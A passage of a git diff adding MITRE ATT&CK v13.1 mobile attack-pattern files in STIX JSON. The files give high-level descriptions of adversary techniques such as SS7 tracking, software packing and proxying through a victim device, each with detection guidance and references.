"bundle--9b027c7d-ffd3-490f-a683-62853260ce2e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "created": "2017-10-25T14:48:11.535Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1432", + "url": "https://attack.mitre.org/techniques/T1432" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-13" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could call standard operating system APIs from a malicious application to gather contact list (i.e., address book) data, or with escalated privileges could directly access files containing contact list data.", + "modified": "2022-04-01T13:19:41.180Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Access Contact List", + "x_mitre_detection": "On both Android (6.0 and up) and iOS, the user can view which applications have permission to access contact list information through the device settings screen, and the user can choose to revoke the permissions.", + "kill_chain_phases": [ + { + "phase_name": "collection", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf.json new file mode 100644 index 0000000000000000000000000000000000000000..44fa3b38a822214469da2e8703fa34ef24056129 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--3c0ecefe-47c9-48f0-83dc-bfc47c10c940", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T15:20:11.752Z", + "name": "Compromise Client Software Binary", + "description": "Adversaries may modify system software binaries to establish persistent access to devices. System software binaries are used by the underlying operating system and users over adb or terminal emulators. \n\nAdversaries may make modifications to client software binaries to carry out malicious tasks when those binaries are executed. For example, malware may come with a pre-compiled malicious binary intended to overwrite the genuine one on the device. Since these binaries may be routinely executed by the system or user, the adversary can leverage this for persistent access to the device. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android\u2019s SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromised devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices. Application vetting services could detect applications trying to modify files in protected parts of the operating system.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "created": "2022-03-30T19:53:27.791Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1645", + "external_id": "T1645" + }, + { + "source_name": "Android-VerifiedBoot", + "description": "Android. (n.d.). Verified Boot. Retrieved December 21, 2016.", + "url": "https://source.android.com/security/verifiedboot/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "external_id": "APP-27" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--51636761-2e35-44bf-9e56-e337adf97174.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--51636761-2e35-44bf-9e56-e337adf97174.json new file mode 100644 index 0000000000000000000000000000000000000000..25324eafe050a49da2be20a558109dbcf0b11058 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--51636761-2e35-44bf-9e56-e337adf97174.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--068b5f5d-8a4f-401a-8b73-bf99bfd104c8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:54:40.501Z", + "name": "Software Packing", + "description": "Adversaries may perform software packing to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. \n\nUtilities used to perform software packing are called packers. An example packer is FTT. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because as legitimate software may use packing techniques to reduce binary size or to protect proprietary code.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "iOS", + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174", + "created": "2022-03-30T19:20:37.864Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1406/002", + "external_id": "T1406.002" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--51aedbd6-2837-4d15-aeb0-cb09f2bf22ac.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--51aedbd6-2837-4d15-aeb0-cb09f2bf22ac.json new file mode 100644 index 0000000000000000000000000000000000000000..e56f3b4801f91bea824570b28031d4308d0e382c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--51aedbd6-2837-4d15-aeb0-cb09f2bf22ac.json @@ -0,0 +1,27 @@ +{ + "type": "bundle", + "id": "bundle--5a524082-c610-4933-84f3-1108001e862d", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--51aedbd6-2837-4d15-aeb0-cb09f2bf22ac", + "type": "attack-pattern", + "created": "2017-10-25T14:48:16.288Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1445", + "external_id": "T1445" + } + ], + "modified": "2018-10-17T01:05:10.701Z", + "name": "Abuse of iOS Enterprise App Signing Key", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--52651225-0b3a-482d-aa7e-10618fd063b5.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--52651225-0b3a-482d-aa7e-10618fd063b5.json new file mode 100644 index 0000000000000000000000000000000000000000..c1d01ce90ce55db18e117388e6b1518bbe2a1fe0 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--52651225-0b3a-482d-aa7e-10618fd063b5.json @@ -0,0 +1,83 @@ +{ + "type": "bundle", + "id": "bundle--869382e9-f57d-49f3-b3ab-0ebd9e39a63c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--52651225-0b3a-482d-aa7e-10618fd063b5", + "created": "2017-10-25T14:48:09.864Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1450", + "url": "https://attack.mitre.org/techniques/T1450" + }, + { + "source_name": "3GPP-Security", + "url": "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf", + "description": "3GPP. (2000, January). A Guide to 3rd Generation Security. Retrieved December 19, 2016." + }, + { + "source_name": "CSRIC5-WG10-FinalReport", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017." + }, + { + "source_name": "CSRIC-WG1-FinalReport", + "description": "CSRIC-WG1-FinalReport" + }, + { + "source_name": "Positive-SS7", + "url": "https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf", + "description": "Positive Technologies. (n.d.). SS7 Attack Discovery. Retrieved December 19, 2016." + }, + { + "source_name": "Engel-SS7-2008", + "url": "https://www.youtube.com/watch?v=q0n5ySqbfdI", + "description": "Tobias Engel. (2008, December). Locating Mobile Phones using SS7. Retrieved December 19, 2016." + }, + { + "source_name": "Engel-SS7", + "url": "https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf", + "description": "Tobias Engel. (2014, December). SS7: Locate. Track. Manipulate.. Retrieved December 19, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "CEL-38" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could exploit signaling system vulnerabilities to track the location of mobile devices. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport)", + "modified": "2022-04-05T19:54:12.657Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit SS7 to Track Device Location", + "x_mitre_detection": "Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation.(Citation: CSRIC-WG1-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb.json new file mode 100644 index 0000000000000000000000000000000000000000..9299168bbc406974c873a2aa9d895fa7d4b94437 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--c601fc44-69c8-4116-a10f-ff47930af628", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "created": "2020-04-28T14:35:37.309Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1575", + "url": "https://attack.mitre.org/techniques/T1575" + }, + { + "source_name": "Google NDK Getting Started", + "url": "https://developer.android.com/ndk/guides", + "description": "Google. (2019, December 27). Getting Started with the NDK. Retrieved April 28, 2020." + }, + { + "source_name": "MITRE App Vetting Effectiveness", + "url": "https://www.mitre.org/sites/default/files/publications/pr-16-4772-analyzing-effectiveness-mobile-app-vetting-tools-report.pdf", + "description": "M. Peck, C. Northern. (2016, August 22). Analyzing the Effectiveness of App Vetting Tools in the Enterprise. Retrieved April 28, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may use Android\u2019s Native Development Kit (NDK) to write native functions that can achieve execution of binaries or functions. Like system calls on a traditional desktop operating system, native code achieves execution on a lower level than normal Android SDK calls.\n\nThe NDK allows developers to write native code in C or C++ that is compiled directly to machine code, avoiding all intermediate languages and steps in compilation that higher level languages, like Java, typically have. The Java Native Interface (JNI) is the component that allows Java functions in the Android app to call functions in a native library.(Citation: Google NDK Getting Started)\n\nAdversaries may also choose to use native functions to execute malicious code since native actions are typically much more difficult to analyze than standard, non-native behaviors.(Citation: MITRE App Vetting Effectiveness)", + "modified": "2022-04-08T15:46:24.495Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Native API", + "x_mitre_detection": "This is abuse of standard OS-level APIs and are therefore typically undetectable to the end user.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--53263a67-075e-48fa-974b-91c5b5445db7.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--53263a67-075e-48fa-974b-91c5b5445db7.json new file mode 100644 index 0000000000000000000000000000000000000000..66513a88af7726c965f5fce50f70851fb7920f48 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--53263a67-075e-48fa-974b-91c5b5445db7.json @@ -0,0 +1,84 @@ +{ + "type": "bundle", + "id": "bundle--7874bcb4-393d-437a-b1d6-b5f10197bec4", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--53263a67-075e-48fa-974b-91c5b5445db7", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1476", + "url": "https://attack.mitre.org/techniques/T1476" + }, + { + "source_name": "IBTimes-ThirdParty", + "url": "https://www.ibtimes.co.uk/danger-lurks-third-party-android-app-stores-1544861", + "description": "A Prasad. (2016, February 19). Danger lurks in third-party Android app stores. Retrieved November 8, 2018." + }, + { + "source_name": "TrendMicro-RootingMalware", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/user-beware-rooting-malware-found-in-3rd-party-app-stores/", + "description": "Jordan Pan. (2016, February 10). User Beware: Rooting Malware Found in 3rd Party App Stores. Retrieved November 8, 2018." + }, + { + "source_name": "android-trojan-steals-paypal-2fa", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/", + "description": "Luk\u00e1\u0161 \u0160tefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019." + }, + { + "source_name": "TrendMicro-FlappyBird", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/flappy-bird-and-third-party-app-stores/", + "description": "Veo Zhang. (2014, February 18). Flappy Bird and Third-Party App Stores. Retrieved November 8, 2018." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "AUT-9" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-13.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-13" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-21" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working.\n\nDelivery methods for the malicious application include:\n\n* [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) - Including the mobile app package as an attachment to an email message.\n* [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) - Including a link to the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, etc.), web site, QR code, or other means.\n* Third-Party App Store - Installed from a third-party app store (as opposed to an authorized app store that the device implicitly trusts as part of its default behavior), which may not apply the same level of scrutiny to apps as applied by an authorized app store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: TrendMicro-FlappyBird)\n\nSome Android malware comes with functionality to install additional applications, either automatically or when the adversary instructs it to.(Citation: android-trojan-steals-paypal-2fa)", + "modified": "2022-04-06T15:41:16.863Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Deliver Malicious App via Other Means", + "x_mitre_detection": "* An EMM/MDM or mobile threat defense solution may be able to identify the presence of apps installed from sources other than an authorized app store. \n* An EMM/MDM or mobile threat defense solution may be able to identify Android devices configured to allow apps to be installed from \"Unknown Sources\".\n* Enterprise email security solutions can identify the presence of Android or iOS application packages within email messages.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--537ea573-8a1c-468c-956b-d16d2ed9d067.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--537ea573-8a1c-468c-956b-d16d2ed9d067.json new file mode 100644 index 0000000000000000000000000000000000000000..dcbbf5dee8f7ca5ffed13c95b3f868793c3e778e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--537ea573-8a1c-468c-956b-d16d2ed9d067.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--fa2033d6-3bec-4aef-9f3c-5e5dd3b7e4cd", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--537ea573-8a1c-468c-956b-d16d2ed9d067", + "created": "2017-10-25T14:48:07.827Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1469", + "url": "https://attack.mitre.org/techniques/T1469" + }, + { + "source_name": "Honan-Hacking", + "url": "https://www.wired.com/2012/08/apple-amazon-mat-honan-hacking/", + "description": "Mat Honan. (2012, August 6). How Apple and Amazon Security Flaws Led to My Epic Hacking. Retrieved December 29, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-5" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "EMM-7" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an EMM console could use that access to wipe enrolled devices (Citation: Honan-Hacking).", + "modified": "2022-04-06T15:54:28.187Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Remotely Wipe Data Without Authorization", + "x_mitre_detection": "Google provides the ability for users to view their general account activity. Apple iCloud also provides notifications to users of account activity.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "remote-service-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a.json new file mode 100644 index 0000000000000000000000000000000000000000..06b134a00bff80a614c071e1361306b477ac33d0 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--00ba31b8-1dba-49c2-9223-4e4eb1260369", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:57:14.285Z", + "name": "Proxy Through Victim", + "description": "Adversaries may use a compromised device as a proxy server to the Internet. By utilizing a proxy, adversaries hide the true IP address of their C2 server and associated infrastructure from the destination of the network traffic. This masquerades an adversary\u2019s traffic as legitimate traffic originating from the compromised device, which can evade IP-based restrictions and alerts on certain services, such as bank accounts and social media websites.(Citation: Threat Fabric Exobot)\n\nThe most common type of proxy is a SOCKS proxy. It can typically be implemented using standard OS-level APIs and 3rd party libraries with no indication to the user. On Android, adversaries can use the `Proxy` API to programmatically establish a SOCKS proxy connection, or lower-level APIs to interact directly with raw sockets.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Enterprises may be able to detect anomalous traffic originating from mobile devices, which could indicate compromise.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a", + "created": "2020-11-30T14:26:07.728Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1604", + "external_id": "T1604" + }, + { + "source_name": "Threat Fabric Exobot", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020.", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--60623164-ccd8-4508-a141-b5a34820b3de.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--60623164-ccd8-4508-a141-b5a34820b3de.json new file mode 100644 index 0000000000000000000000000000000000000000..4017d33ef969dbd0fca4791ee4cbf14b461d892e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--60623164-ccd8-4508-a141-b5a34820b3de.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--d668b9e7-2ecd-4d20-a1fe-9ef47a368e4c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--60623164-ccd8-4508-a141-b5a34820b3de", + "created": "2019-09-23T13:11:43.694Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1520", + "url": "https://attack.mitre.org/techniques/T1520" + }, + { + "source_name": "Data Driven Security DGA", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019." + }, + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan \u2013 banker and ransomware. Retrieved September 23, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1520) (DGAs) to procedurally generate domain names for command and control communication, and other uses such as malicious application distribution.(Citation: securelist rotexy 2018)\n\nDGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.", + "modified": "2022-04-05T20:03:46.788Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain Generation Algorithms", + "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--62adb627-f647-498e-b4cc-41499361bacb.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--62adb627-f647-498e-b4cc-41499361bacb.json new file mode 100644 index 0000000000000000000000000000000000000000..5f279311bf9d3136bbd2d425871b9068f1031815 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--62adb627-f647-498e-b4cc-41499361bacb.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--2c72f9bc-1b57-4ff1-ac0f-752cf51a4c7d", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--62adb627-f647-498e-b4cc-41499361bacb", + "created": "2017-10-25T14:48:20.727Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1435", + "url": "https://attack.mitre.org/techniques/T1435" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-13" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could call standard operating system APIs from a malicious application to gather calendar entry data, or with escalated privileges could directly access files containing calendar data.", + "modified": "2022-04-01T12:50:48.453Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Access Calendar Entries", + "x_mitre_detection": "On both Android (6.0 and up) and iOS, the user can view which applications have permission to access calendar information through the device settings screen, and the user can choose to revoke the permissions.", + "kill_chain_phases": [ + { + "phase_name": "collection", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": 